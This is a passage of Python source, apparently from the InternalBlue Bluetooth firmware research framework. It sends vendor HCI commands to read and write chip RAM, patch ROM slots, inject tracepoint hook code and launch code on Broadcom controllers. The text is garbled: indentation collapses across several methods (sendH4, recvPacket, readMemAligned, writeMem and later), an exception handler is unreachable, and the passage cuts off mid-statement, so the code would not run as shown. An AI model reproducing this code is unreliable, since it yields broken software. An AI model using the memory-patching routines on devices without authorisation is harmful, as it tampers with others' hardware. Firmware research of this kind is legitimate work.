    """Run-function of the recvThread; must be overridden by subclasses."""
    pass
def _sendThreadFunc(self):
    # type: () -> None
    """
    This is the run-function of the sendThread. It polls the sendQueue for new 'send tasks'
    and executes them (sends H4 commands to the chip and returns the response).
    The entries of the sendQueue are tuples representing a 'send task':
      (h4type, payload, response_queue)
       - h4type: The H4 type (8 bit integer) to send
       - data:   The H4 payload (byte string) to send
       - response_queue: queue that is used for delivering the H4 response
                         back to the entity that put the H4 command into the
                         sendQueue.
    Use sendHciCommand() to put 'send tasks' into the sendQueue!
    The thread stops when exit_requested is set to True.
    """
    log.debug("Send Thread started.")
    while not self.exit_requested:
        # Little bit ugly: need to re-apply changes to the global context to the thread-copy
        context.log_level = self.log_level
        # Wait for 'send task' in send queue
        try:
            task = self.sendQueue.get(timeout=0.5)
        except queue2k.Empty:
            continue
        # Extract the components of the task
        try:
            h4type, data, queue, filter_function = task
        except ValueError:
            # might happen if H4 is not supported
            log.debug("Failed to unpack queue item.")
            continue
        # Special handling of ADBCore and HCICore
        # ADBCore: adb transport requires to prepend the H4 data with its length
        # HCICore: need to manually save the data to btsnoop log as it is not
        #          reflected to us as with adb
        if self.__class__.__name__ == "ADBCore":
            # prepend with total length for H4 over adb with modified Bluetooth module
            if not self.serial:
                data = p16(len(data)) + data
            # If we do not have a patched module, we write to the serial using the same socket.
            # Echoing HCI commands to the serial interface has the following syntax:
            #
            #   echo -ne "\x01\x4c\xfc\x05\x33\x22\x11\x00\xaa"
            #       0x01:   HCI command
            #       0xfc4c: Write RAM
            #       0x05:   Parameter length
            #       0x3322...: Parameters
            #
            # ...and that's how the data is formatted already anyway
        elif self.__class__.__name__ == "HCICore":
            if self.write_btsnooplog:
                # btsnoop record header data:
                btsnoop_data = p8(h4type) + data
                btsnoop_orig_len = len(btsnoop_data)
                btsnoop_inc_len = len(btsnoop_data)
                btsnoop_flags = 0
                btsnoop_drops = 0
                btsnoop_time = datetime.datetime.now()
                btsnoop_record_hdr = struct.pack(
                    ">IIIIq",
                    btsnoop_orig_len,
                    btsnoop_inc_len,
                    btsnoop_flags,
                    btsnoop_drops,
                    self._btsnoop_pack_time(btsnoop_time),
                )
                # NOTE(review): btsnooplog_file_lock is not created in this
                # class' __init__ — presumably provided by HCICore; verify.
                with self.btsnooplog_file_lock:
                    self.btsnooplog_file.write(btsnoop_record_hdr)
                    self.btsnooplog_file.write(btsnoop_data)
                    self.btsnooplog_file.flush()
        # Prepend UART TYPE and length.
        out = p8(h4type) + data
        # if the caller expects a response: register a queue to receive the response
        if queue is not None and filter_function is not None:
            recvQueue = queue2k.Queue(1)
            self.registerHciRecvQueue(recvQueue, filter_function)
        # Send command to the chip using s_inject socket
        try:
            log.debug("_sendThreadFunc: Send: " + bytes_to_hex(out))
            self.s_inject.send(out)
        except socket.error:
            # TODO: For some reason this was required for proper save and replay, so this should be handled globally somehow. Or by implementing proper testing instead of the save/replay hack
            pass
        except socket.error as e:
            # NOTE(review): this second socket.error handler is unreachable —
            # the handler above already catches socket.error; the reconnect
            # logic below is therefore dead code. TODO confirm intended order.
            log.warn(
                "_sendThreadFunc: Sending to socket failed with {}, reestablishing connection.\nWith HCI sockets, some HCI commands require root!".format(
                    e
                )
            )
            # socket are terminated by hcicore..
            self._teardownSockets()
            self._setupSockets()
        # if the caller expects a response:
        # Wait for the HCI event response by polling the recvQueue
        if queue is not None and filter_function is not None:
            try:
                record = recvQueue.get(timeout=2)
                hcipkt = record[0]
                data = hcipkt.data
            except queue2k.Empty:
                log.warn("_sendThreadFunc: No response from the firmware.")
                data = None
                self.unregisterHciRecvQueue(recvQueue)
                continue
            queue.put(data)
            self.unregisterHciRecvQueue(recvQueue)
    log.debug("Send Thread terminated.")
def _tracepointHciCallbackFunction(self, record):
    # type: (Record) -> None
    """
    HCI callback handling the custom events emitted by the tracepoint hook
    code: a register dump (header b"TRACE_") or a RAM dump fragment
    (header b"RAM___"). Captured data is written to files inside
    self.data_directory; a hit tracepoint is removed from self.tracepoints.
    """
    hcipkt = record[0]  # get HCI Event packet
    # Check if event contains a tracepoint packet
    if not issubclass(hcipkt.__class__, hci.HCI_Event):
        return
    if hcipkt.event_code != 0xFF:  # must be custom event (0xff)
        return
    # BUGFIX: compare against bytes literals. On Python 3 hcipkt.data is a
    # bytes object, so a comparison with the str "TRACE_" would always be
    # False; on Python 2 b"..." and "..." are the same type, so this is
    # backward compatible.
    if hcipkt.data[0:6] == b"TRACE_":  # My custom header (see hook code)
        data = hcipkt.data[6:]
        # 17 little-endian 32-bit values: pc, sp, cpsr, r0-r12, lr
        tracepoint_registers = [u32(data[i : i + 4]) for i in range(0, 68, 4)]
        pc = tracepoint_registers[0]
        registers = "pc: 0x%08x lr: 0x%08x sp: 0x%08x cpsr: 0x%08x\n" % (
            pc,
            tracepoint_registers[16],
            tracepoint_registers[1],
            tracepoint_registers[2],
        )
        registers += (
            "r0: 0x%08x r1: 0x%08x r2: 0x%08x r3: 0x%08x r4: 0x%08x\n"
            % tuple(tracepoint_registers[3:8])
        )
        registers += (
            "r5: 0x%08x r6: 0x%08x r7: 0x%08x r8: 0x%08x r9: 0x%08x\n"
            % tuple(tracepoint_registers[8:13])
        )
        registers += "r10: 0x%08x r11: 0x%08x r12: 0x%08x\n" % tuple(
            tracepoint_registers[13:16]
        )
        log.info("Tracepoint 0x%x was hit and deactivated:\n" % pc + registers)
        filename = (
            self.data_directory
            + "/"
            + "internalblue_tracepoint_registers_%s.bin"
            % datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
        )
        log.info("Captured Registers for Tracepoint to %s" % filename)
        # use a context manager so the file is closed even if write() fails
        with open(filename, "w") as f:
            f.write(registers)
        self.tracepoint_registers = tracepoint_registers
        # remove tracepoint from self.tracepoints
        for tp in self.tracepoints:
            if tp[0] == pc:
                self.tracepoints.remove(tp)
                break
        # reset all RAM dump related variables:
        self.tracepoint_memdump_address = None
        self.tracepoint_memdump_parts = {}
    elif hcipkt.data[0:6] == b"RAM___":  # My custom header (see hook code)
        dump_address = u32(hcipkt.data[6:10])
        data = hcipkt.data[10:]
        # First fragment defines the base address of the dump
        if self.tracepoint_memdump_address is None:
            self.tracepoint_memdump_address = dump_address
        normalized_address = dump_address - self.tracepoint_memdump_address
        self.tracepoint_memdump_parts[normalized_address] = data
        # Check if this was the last packet
        if (
            len(self.tracepoint_memdump_parts)
            == self.fw.TRACEPOINT_RAM_DUMP_PKT_COUNT
        ):
            dump = flat(self.tracepoint_memdump_parts)
            # TODO: use this to start qemu
            filename = (
                self.data_directory
                + "/"
                + "internalblue_tracepoint_0x%x_%s.bin"
                % (
                    self.tracepoint_memdump_address,
                    datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"),
                )
            )
            log.info(
                "Captured Ram Dump for Tracepoint 0x%x to %s"
                % (self.tracepoint_memdump_address, filename)
            )
            with open(filename, "wb") as f:
                f.write(dump)
def addTracepoint(self, address):
    # type: (Address) -> bool
    """
    Install a tracepoint at *address* (must be 4-byte aligned, max. 5 at a
    time). When hit, the injected hook code reports registers and a RAM dump
    via custom HCI events (see _tracepointHciCallbackFunction) and the
    tracepoint deactivates itself. Returns True on success.
    """
    # Check if constants are defined in fw.py
    for const in [
        "TRACEPOINT_BODY_ASM_LOCATION",
        "TRACEPOINT_BODY_ASM_SNIPPET",
        "TRACEPOINT_HOOK_ASM",
        "TRACEPOINT_HOOKS_LOCATION",
        "TRACEPOINT_HOOK_SIZE",
    ]:
        if const not in dir(self.fw):
            log.warn(
                "addTracepoint: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
            )
            return False
    if not self.check_running():
        return False
    # FIXME: Currently only works for aligned addresses
    if address % 4 != 0:
        log.warn("Only tracepoints at aligned addresses are allowed!")
        return False
    # Check if tracepoint exists
    existing_hook_addresses = []
    for tp_address, tp_hook_address in self.tracepoints:
        existing_hook_addresses.append(tp_hook_address)
        if tp_address == address:
            log.warn("Tracepoint at 0x%x does already exist!" % address)
            return False
    # we only have room for 0x90/28 = 5 tracepoints
    if len(self.tracepoints) >= 5:
        log.warn("Already using the maximum of 5 tracepoints")
        return False
    # Find a free address for the hook code
    for i in range(5):
        hook_address = (
            self.fw.TRACEPOINT_HOOKS_LOCATION + self.fw.TRACEPOINT_HOOK_SIZE * i
        )
        if hook_address not in existing_hook_addresses:
            break
    # Check if this is the first tracepoint
    if self._tracepointHciCallbackFunction not in self.registeredHciCallbacks:
        log.info("Initial tracepoint: setting up tracepoint engine.")
        # compile assembler snippet containing the hook body code:
        hooks_code = asm(
            self.fw.TRACEPOINT_BODY_ASM_SNIPPET,
            vma=self.fw.TRACEPOINT_BODY_ASM_LOCATION,
            arch="thumb",
        )
        if len(hooks_code) > 0x100:
            # NOTE(review): pwnlib's log.error raises an exception, which
            # would abort here — TODO confirm that is the intended behavior
            # (the parallel check below explicitly returns False).
            log.error(
                "Assertion failed: len(hooks_code)=%d is larger than 0x100!"
                % len(hooks_code)
            )
        # save memory content at the addresses where we place the snippet and the stage-1 hooks
        self.tracepoint_saved_data = self.readMem(
            self.fw.TRACEPOINT_BODY_ASM_LOCATION, 0x100
        )
        # write code for hook to memory
        self.writeMem(self.fw.TRACEPOINT_BODY_ASM_LOCATION, hooks_code)
        # Register tracepoint hci callback function
        self.registerHciCallback(self._tracepointHciCallbackFunction)
    # Add tracepoint to list
    self.tracepoints.append((address, hook_address))
    ### Injecting stage-1 hooks ###
    # save the 4 bytes at which the hook branch (e.g. b <hook address>) will be placed
    saved_instructions = self.readMem(address, 4)
    # we need to know the patchram slot in advance..
    # little trick/hack: we just insert a patch now with the original data to
    # receive the slot value. later we insert the actual patch which will reuse
    # the same slot.
    # FIXME: To increase performance, try to not do it like that ^^
    self.patchRom(address, saved_instructions)
    table_addresses, _, _ = self.getPatchramState()
    patchram_slot = table_addresses.index(address)
    log.info("Using patchram slot %d for tracepoint." % patchram_slot)
    self.disableRomPatch(
        address
    )  # Eval board requires to delete patch before installing it again
    # compile assembler snippet containing the stage-1 hook code:
    stage1_hook_code = asm(
        self.fw.TRACEPOINT_HOOK_ASM
        % (address, patchram_slot, self.fw.TRACEPOINT_BODY_ASM_LOCATION, address),
        vma=hook_address,
        arch="thumb",
    )
    if len(stage1_hook_code) > self.fw.TRACEPOINT_HOOK_SIZE:
        log.error(
            "Assertion failed: len(stage1_hook_code)=%d is larger than TRACEPOINT_HOOK_SIZE!"
            % len(stage1_hook_code)
        )
        return False
    # write code for hook to memory
    log.debug("addTracepoint: injecting hook function...")
    self.writeMem(hook_address, stage1_hook_code)
    # patch in the hook branch instruction
    patch = asm("b 0x%x" % hook_address, vma=address, arch="thumb")
    if not self.patchRom(address, patch):
        log.warn("addTracepoint: couldn't insert tracepoint hook!")
        return False
    log.debug(
        "addTracepoint: Placed Tracepoint at 0x%08x (hook at 0x%x)."
        % (address, hook_address)
    )
    return True
def deleteTracepoint(self, address):
    # type: (Address) -> bool
    """
    Remove the tracepoint installed at *address* and free its patchram
    slot. Returns False if the framework is not running or no tracepoint
    exists at that address.
    """
    if not self.check_running():
        return False
    # locate the (target_address, hook_address) entry for this address
    matching_entry = None
    for entry in self.tracepoints:
        if entry[0] == address:
            matching_entry = entry
            break
    if matching_entry is None:
        log.warn("deleteTracepoint: No tracepoint at address: 0x%x" % address)
        return False
    # disable patchram slot for the tracepoint
    self.disableRomPatch(matching_entry[0])
    # remove tracepoint from self.tracepoints
    self.tracepoints.remove(matching_entry)
    return True
def check_running(self):
    # type: () -> bool
    """
    Check if the framework is running (i.e. the sockets are connected,
    the recv and send threads are running and exit_requested is not True)
    """
    if self.exit_requested:
        self.shutdown()
    if self.running:
        return True
    log.warn("Not running. call connect() first!")
    return False
@abstractmethod
def device_list(self):
    # type: () -> List[DeviceTuple]
    """Enumerate attached devices; must be overridden by subclasses."""
    pass
def connect(self):
    # type: () -> bool
    """
    Connect to the target: perform the transport-specific setup
    (local_connect), start the send/recv worker threads, register the
    stack-dump callback and load the firmware definition.
    Returns True on success.
    """
    if self.exit_requested:
        self.shutdown()
    if self.running:
        log.warn("Already running. call shutdown() first!")
        return False
    if not self.interface:
        log.warn("No adb device identifier is set")
        return False
    if not self.local_connect():
        return False
    log.info("Connected to %s", self.interface)
    # start receive thread
    # FIX: Thread.setDaemon() is deprecated; assign the daemon attribute
    # instead (equivalent behavior on Python 2.6+ and Python 3).
    self.recvThread = context.Thread(target=self._recvThreadFunc)
    self.recvThread.daemon = True
    self.recvThread.start()
    # start send thread
    self.sendThread = context.Thread(target=self._sendThreadFunc)
    self.sendThread.daemon = True
    self.sendThread.start()
    # register stackDumpReceiver callback:
    self.stackDumpReceiver = hci.StackDumpReceiver()
    # register hci callback:
    self.registerHciCallback(self.stackDumpReceiver.recvPacket)
    if not self.initialize_fimware():
        log.warn("connect: Failed to initialize firmware!")
        return False
    self.running = True
    return True
@abstractmethod
def local_connect(self):
    """Transport-specific connection setup; overridden by subclasses."""
    return True
def initialize_fimware(self):
    # type: () -> bool
    """
    Checks if we are running on a Broadcom chip and loads available firmware information based
    on LMP subversion.
    """
    # send Read_Local_Version_Information
    version = self.sendHciCommand(
        HCI_COMND.Read_Local_Version_Information, "".encode("utf-8")
    )
    # A valid response carries at least 12 bytes (we index up to version[11])
    if not version or len(version) < 11:
        log.warn(
            """initialize_fimware: Failed to send a HCI command to the Bluetooth driver.
adb: Check if you installed a custom bluetooth.default.so properly on your
Android device. bluetooth.default.so must contain the string 'hci_inject'.
hci: You might have insufficient permissions to send this type of command."""
        )
        return False
    # Broadcom uses 0x000f as vendor ID, Cypress 0x0131
    vendor = (version[9] << 8) + version[8]
    if vendor not in (0xF, 0x131):
        log.critical("Not running on a Broadcom or Cypress chip!")
        return False
    subversion = (version[11] << 8) + version[10]
    # iOSCore needs the iOS-specific firmware tables
    running_on_ios = self.__class__.__name__ == "iOSCore"
    self.fw = Firmware(subversion, running_on_ios).firmware
    # Safe to turn diagnostic logging on, it just gets a timeout if the Android
    # driver was recompiled with other flags but without applying a proper patch.
    log.info("Try to enable debugging on H4 (warning if not supported)...")
    self.enableBroadcomDiagnosticLogging(True)
    return True
def shutdown(self):
    # type: () -> None
    """
    Shutdown the framework by stopping the send and recv threads. Socket shutdown
    also terminates port forwarding if adb is used.
    """
    # Setting exit_requested to True will stop the send and recv threads at their
    # next while loop iteration
    self.exit_requested = True
    # unregister stackDumpReceiver callback:
    # BUGFIX: the original cleared self.stackDumpReceiver to None *before*
    # testing it, so unregisterHciCallback() was never reached. Unregister
    # first, then drop the reference.
    if self.stackDumpReceiver is not None:
        self.unregisterHciCallback(self.stackDumpReceiver.recvPacket)
        self.stackDumpReceiver = None
    # Wait until both threads have actually finished
    self.recvThread.join()
    self.sendThread.join()
    # Disconnect the TCP sockets
    self._teardownSockets()
    if self.write_btsnooplog:
        self.btsnooplog_file.close()
    self.running = False
    self.exit_requested = False
    log.info("Shutdown complete.")
def registerHciCallback(self, callback):
    # type: (Callable[[Record], None ]) -> None
    """
    Add a callback function to self.registeredHciCallbacks.
    The recvThread invokes every registered callback for each received HCI
    packet, passing the packet as the only argument. The packet is a tuple:
      - HCI packet (subclass of HCI, see hci.py)
      - original length
      - inc_len
      - flags
      - drops
      - timestamp (python datetime object)
    Registering the same callback twice is refused with a warning.
    """
    if callback not in self.registeredHciCallbacks:
        self.registeredHciCallbacks.append(callback)
    else:
        log.warn("registerHciCallback: callback already registered!")
def unregisterHciCallback(self, callback):
    # type: (Callable[[Tuple[HCI, int, int, int, Any, datetime.datetime]], None ]) -> None
    """
    Remove a callback function from self.registeredHciCallbacks.
    Logs a warning if the callback was never registered.
    """
    if callback in self.registeredHciCallbacks:
        self.registeredHciCallbacks.remove(callback)
        return
    # BUGFIX: the warning previously named the wrong function
    # ("registerHciCallback"), which made log output misleading.
    log.warn("unregisterHciCallback: no such callback is registered!")
def registerHciRecvQueue(self, queue, filter_function=None):
    # type: (queue2k.Queue[Record], FilterFunction) -> None
    """
    Add a new queue to self.registeredHciRecvQueues.
    The queue will be filled by the recvThread every time the thread receives
    a HCI packet. The format of the packet is a tuple containing:
      - HCI packet (subclass of HCI, see hci.py)
      - original length
      - inc_len
      - flags
      - drops
      - timestamp (python datetime object)
    If filter_function is not None, the tuple will first be passed
    to the function and only if the function returns True, the packet
    is put into the queue.
    """
    # BUGFIX: the list stores (queue, filter_function) tuples, so the
    # original membership test `queue in self.registeredHciRecvQueues`
    # compared the queue against tuples and could never match; compare
    # against the stored queue objects instead.
    if any(entry[0] == queue for entry in self.registeredHciRecvQueues):
        log.warn("registerHciRecvQueue: queue already registered!")
        return
    self.registeredHciRecvQueues.append((queue, filter_function))
def unregisterHciRecvQueue(self, queue):
    # type: (queue2k.Queue[Tuple[HCI, int, int, int, Any, datetime]]) -> None
    """
    Remove a queue from self.registeredHciRecvQueues.
    Logs a warning if the queue was never registered.
    """
    for entry in self.registeredHciRecvQueues:
        if entry[0] == queue:
            self.registeredHciRecvQueues.remove(entry)
            return
    # BUGFIX: the warning previously named the wrong function
    # ("registerHciRecvQueue"), which made log output misleading.
    log.warn("unregisterHciRecvQueue: no such queue is registered!")
def sendHciCommand(
    self, hci_opcode: HCI_COMND, data: bytes, timeout: int = 3
) -> Optional[bytearray]:
    """
    Send an arbitrary HCI command packet by pushing a send-task into the
    sendQueue. This function blocks until the response is received
    or the timeout expires. The return value is the Payload of the
    HCI Command Complete Event which was received in response to
    the command or None if no response was received within the timeout.
    """
    # Support legacy code that passes an integer instead of a HCI_COMND for now
    # This would be more elegant with a
    # flag that can be set to allow arbitrary bytes for the HCI command but that would require literal types
    # (PEP586) which are only supported with python 3.8+
    # For static type analysis this is good enough, because if someone hardcodes some hci command they might as well document it
    if isinstance(hci_opcode, HCI_COMND):
        opcode = hci_opcode.value
    elif isinstance(hci_opcode, int):
        opcode = hci_opcode
    else:
        raise ValueError(
            "opcode parameter to sendHciCommand must be either integer or HCI_COMND enum member"
        )
    # TODO: If the response is a HCI Command Status Event, we will actually
    #       return this instead of the Command Complete Event (which will
    #       follow later and will be ignored). This should be fixed..
    # single-slot queue: the sendThread delivers exactly one response here
    queue = queue2k.Queue(1)
    # standard HCI command structure
    payload = p16(opcode) + p8(len(data)) + data

    # define a filter function which recognizes the response (command complete
    # or command status event).
    def recvFilterFunction(record):
        # type: (Record) -> bool
        hcipkt = record[0]
        log.debug("sendHciCommand.recvFilterFunction: got response")
        # Interpret HCI event
        if isinstance(hcipkt, hci.HCI_Event):
            if hcipkt.event_code == 0x0E:  # Cmd Complete event
                if u16(hcipkt.data[1:3]) == opcode:
                    return True
            if hcipkt.event_code == 0x0F:  # Cmd Status event
                if u16(hcipkt.data[2:4]) == opcode:
                    return True
        return False

    try:
        self.sendQueue.put(
            (hci.HCI.HCI_CMD, payload, queue, recvFilterFunction), timeout=timeout
        )
        # block until the sendThread delivers the response (or timeout)
        ret = queue.get(timeout=timeout)
        return ret
    except queue2k.Empty:
        log.warn("sendHciCommand: waiting for response timed out!")
        # If there was no response because the Trace Replay Hook throw an assert it will be in this attribute.
        # Raise this so the main thread doesn't ignore this and it will be caught by any testing framework
        if hasattr(self, "test_failed"):
            raise self.test_failed
        return None
    except queue2k.Full:
        log.warn("sendHciCommand: send queue is full!")
        return None
def sendH4(self, h4type, data, timeout=2):
# type: (HCI_CMD, bytes, int) -> bool
"""
Send an arbitrary H4 packet by pushing a send-task into the
sendQueue. This function does not wait for a response! If you
need to receive a response, register an hciRecvQueue or -callback.
The return value is True if the send-task could be put inside the
queue and False if it was not possible within the timeout.
"""
try:
self.sendQueue.put((h4type, data, None, None), timeout=timeout)
return True
except queue2k.Full:
log.warn("sendH4: send queue is full!")
return False
def recvPacket(self, timeout=None):
# type: (Optional[int]) -> Optional[Record]
"""
This function polls the recvQueue for the next available HCI
packet and returns it. The function checks whether it is called
from the sendThread or any other thread and respectively chooses
either the sendThreadrecvQueue or the recvQueue. (FIXME: no it does not?!)
The recvQueue is filled by the recvThread. If the queue fills up
the recvThread empties the queue (unprocessed packets are lost).
The recvPacket function is meant to receive raw HCI packets in
a blocking manner. Consider using the registerHciCallback()
functionality as an alternative which works asynchronously.
"""
log.debug("recvPacket: called")
if not self.check_running():
return None
try:
return self.recvQueue.get(timeout=timeout)
except queue2k.Empty:
return None
    def readMem(self, address, length, progress_log=None, bytes_done=0, bytes_total=0):
        # type: (Address, int, Optional[Any], int, int) -> Optional[bytes]
        """
        Reads <length> bytes from the memory space of the firmware at the given
        address, using the vendor-specific Read_RAM HCI command in chunks of at
        most 251 bytes. Reading from unmapped memory or certain memory-mapped-IO
        areas which need aligned access crashes the chip.
        Returns the accumulated data (bytearray) or None on failure; on an
        empty response or a nonzero status byte the loop breaks and a partial
        buffer is returned.
        Optional arguments for progress logs:
        - progress_log: An instance of log.progress() which will be updated during the read.
        - bytes_done: Number of bytes that have already been read with earlier calls to
          readMem() and belonging to the same transaction which is covered by progress_log.
        - bytes_total: Total bytes that will be read within the transaction covered by progress_log.
        """
        log.debug("readMem: reading at 0x%x" % address)
        if not self.check_running():
            return None
        read_addr = address  # read_addr is the address of the next Read_RAM HCI command
        byte_counter = 0  # tracks the number of received bytes
        outbuffer = (
            bytearray()
        )  # buffer which stores all accumulated data read from the chip
        if bytes_total == 0:  # If no total bytes were given just use length
            bytes_total = length
        retry = 3  # Retry budget; re-armed after every successful chunk
        while (
            read_addr < address + length
        ):  # Send HCI Read_RAM commands until all data is received
            # Send hci frame
            bytes_left = length - byte_counter
            blocksize = bytes_left
            if blocksize > 251:  # The max. size of a Read_RAM payload is 251
                blocksize = 251
            # Send Read_RAM (0xfc4d) command
            response = self.sendHciCommand(
                HCI_COMND.VSC_Read_RAM, p32(read_addr) + p8(blocksize)
            )
            if response is None or not response:
                log.warn(
                    "readMem: No response to readRAM HCI command! (read_addr=%x, len=%x)"
                    % (read_addr, length)
                )
                # Retry once...
                if retry > 0:
                    log.debug("readMem: retrying once...")
                    retry = retry - 1
                    continue
                else:
                    log.warning("readMem: failed!")
                    return None
            data = response[4:]  # start of the actual data is at offset 4
            if len(data) == 0:  # this happens i.e. if not called on a brcm chip
                log.warn("readMem: empty response, quitting...")
                break
            if len(data) != blocksize:
                # NOTE(review): retry is NOT decremented on this path, so a chip
                # that keeps returning short reads would loop forever — confirm.
                log.debug("readMem: insufficient bytes returned, retrying...")
                continue
            status = response[3]
            if status != 0:
                # It is not yet reverse engineered what this byte means. For almost
                # all memory addresses it will be 0. But for some it will be different,
                # EDIT: response should be a command complete event (event code 0x0e). The 4 byte (response[3]) indicates the hci error code
                # 0x00 (0) means everything okay
                # 0x12 means Command Disallowed
                # e.g. for address 0xff000000 (aka 'EEPROM') it is 0x12
                log.warn(
                    "readMem: [TODO] Got status != 0 : error 0x%02X at address 0x%08x"
                    % (status, read_addr)
                )
                break
            # do double checking, but prevent loop
            if self.doublecheck and retry > 0:
                response_check = self.sendHciCommand(
                    HCI_COMND.VSC_Read_RAM, p32(read_addr) + p8(blocksize)
                )
                if response != response_check:
                    log.debug(
                        "readMem: double checking response failed at 0x%x! retry..."
                        % read_addr
                    )
                    time.sleep(0.3)
                    retry = retry - 1
                    continue
            outbuffer += data
            read_addr += len(data)
            byte_counter += len(data)
            if progress_log is not None:
                msg = "receiving data... %d / %d Bytes (%d%%)" % (
                    bytes_done + byte_counter,
                    bytes_total,
                    old_div((bytes_done + byte_counter) * 100, bytes_total),
                )
                progress_log.status(msg)
            retry = 3  # this round worked, so we re-enable retries
        return outbuffer
def readMemAligned(
self, address, length, progress_log=None, bytes_done=0, bytes_total=0
):
# type: (int, int, Optional[Any], int, int) -> Any
"""
This is an alternative to readMem() which enforces a strictly aligned access
to the memory that is read. This is needed for e.g. the memory-mapped-IO
section at 0x310000 (patchram) and possibly other sections as well.
The arguments are equivalent to readMem() except that the address and length
have to be 4-byte aligned.
The current implementation works like this (and obviously can be improved!):
- Work in chunks of max. 244 bytes (restricted by max. size of HCI event)
- For each chunk do:
- Write a code snippet to the firmware which copies the chunk of memory
into a custom HCI Event and sends it to the host (this uses aligned
ldr and str instructions)
- Register a hciCallbackFunction for receiving the custom event
"""
# Check if constants are defined in fw.py
for const in ["READ_MEM_ALIGNED_ASM_LOCATION", "READ_MEM_ALIGNED_ASM_SNIPPET"]:
if const not in dir(self.fw):
log.warn(
"readMemAligned: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
if not self.check_running():
return None
# Force length to be multiple of 4 (needed for strict alignment)
if length % 4 != 0:
log.warn("readMemAligned: length (0x%x) must be multiple of 4!" % length)
return None
# Force address to be multiple of 4 (needed for strict alignment)
if address % 4 != 0:
log.warn("readMemAligned: address (0x%x) must be 4-byte aligned!" % address)
return None
recvQueue = queue2k.Queue(1)
def hciFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return False
if hcipkt.event_code != 0xFF:
return False
if hcipkt.data[0:4] != bytes("READ", "utf-8"):
return False
return True
self.registerHciRecvQueue(recvQueue, hciFilterFunction)
read_addr = address
byte_counter = 0
outbuffer = (
bytearray()
)
if bytes_total == 0:
bytes_total = length
while read_addr < address + length:
bytes_left = length - byte_counter
blocksize = bytes_left
if blocksize > 244:
blocksize = 244
# Customize the assembler snippet with the current read_addr and blocksize
code = asm(
self.fw.READ_MEM_ALIGNED_ASM_SNIPPET
% (blocksize, read_addr, old_div(blocksize, 4)),
vma=self.fw.READ_MEM_ALIGNED_ASM_LOCATION,
arch="thumb",
)
# Write snippet to the RAM (TODO: maybe backup and restore content of this area?)
self.writeMem(self.fw.READ_MEM_ALIGNED_ASM_LOCATION, code)
# Run snippet
if not self.launchRam(self.fw.READ_MEM_ALIGNED_ASM_LOCATION):
# on iOSCore the return value might be wrong
if self.doublecheck:
log.debug("readMemAligned: probably failed, but continuing...")
else:
log.error("readMemAligned: launching assembler snippet failed!")
return None
# wait for the custom HCI event sent by the snippet:
try:
record = recvQueue.get(timeout=1)
except queue2k.Empty:
log.warn("readMemAligned: No response from assembler snippet.")
return None
hcipkt = record[0]
data = hcipkt.data[4:]
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if progress_log is not None:
msg = "receiving data... %d / %d Bytes (%d%%)" % (
bytes_done + byte_counter,
bytes_total,
old_div((bytes_done + byte_counter) * 100, bytes_total),
)
progress_log.status(msg)
self.unregisterHciRecvQueue(recvQueue)
return outbuffer
def writeMem(self, address, data, progress_log=None, bytes_done=0, bytes_total=0):
# type: (int, bytes, Optional[Any], int, int) -> Optional[bool]
"""
Writes the <data> to the memory space of the firmware at the given
address.
Optional arguments for progress logs:
- progress_log: An instance of log.progress() which will be updated during the write.
- bytes_done: Number of bytes that have already been written with earlier calls to
writeMem() and belonging to the same transaction which is covered by progress_log.
- bytes_total: Total bytes that will be written within the transaction covered by progress_log.
"""
log.debug("writeMem: writing to 0x%x" % address)
if not self.check_running():
return None
write_addr = address
byte_counter = 0
if bytes_total == 0:
bytes_total = len(data)
while byte_counter < len(data):
# Send hci frame
bytes_left = len(data) - byte_counter
blocksize = bytes_left
if blocksize > 251:
blocksize = 251
response = self.sendHciCommand(
HCI_COMND.VSC_Write_RAM,
p32(write_addr) + data[byte_counter : byte_counter + blocksize],
)
if response is None:
log.warn(
"writeMem: Timeout while reading response, probably need to wait longer."
)
return False
elif response[3] != 0:
log.warn(
"writeMem: Got error code %d in command complete event."
% response[3]
)
return False
write_addr += blocksize
byte_counter += blocksize
if progress_log is not None:
msg = "sending data... %d / %d Bytes" % (
bytes_done + byte_counter,
bytes_total,
)
progress_log.status(msg)
return True
def launchRam(self, address):
# type: (int) -> bool
"""
Executes a function at the specified address in the context of the HCI
handler thread. The function has to comply with the calling convention.
As the function blocks the HCI handler thread, the chip will most likely
crash (or be resetted by Android) if the function takes too long.
"""
response = self.sendHciCommand(HCI_COMND.VSC_Launch_RAM, p32(address))
if response is None:
log.warn(
"Empty HCI response during launchRam, driver crashed due to invalid code or destination"
)
return False
error_code = response[3]
if error_code != 0:
log.warn("Got error code %x in command complete event." % error_code)
return False
# Nexus 6P Bugfix
if "LAUNCH_RAM_PAUSE" in dir(self.fw) and self.fw.LAUNCH_RAM_PAUSE:
log.debug("launchRam: Bugfix, sleeping %ds" % self.fw.LAUNCH_RAM_PAUSE)
time.sleep(self.fw.LAUNCH_RAM_PAUSE)
return True
def getPatchramState(self):
# type: () -> Union[bool, Tuple[List[Optional[int]], List[Union[Union[int, bytes, None], Any]], list]]
"""
Retrieves the current state of the patchram unit. The return value
is a tuple containing 3 lists which are indexed by the slot number:
- target_addresses: The address which is patched by this slot (or None)
- new_values: The new (patch) value (or None)
- enabled_bitmap: 1 if the slot is active, 0 if not (integer)
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
"PATCHRAM_VALUE_TABLE_ADDRESS",
"PATCHRAM_NUMBER_OF_SLOTS",
"PATCHRAM_ALIGNED",
]:
if const not in dir(self.fw):
log.warn(
"getPatchramState: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
% const
)
return False
slot_count = self.fw.PATCHRAM_NUMBER_OF_SLOTS
# On Nexus 5, ReadMemAligned is required, while Nexus 6P supports this memory area with ReadRAM
if self.fw.PATCHRAM_ALIGNED:
slot_dump = self.readMemAligned(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count, 4)
)
table_addr_dump = self.readMemAligned(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count * 4
)
else:
slot_dump = self.readMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count, 4)
)
table_addr_dump = self.readMem(
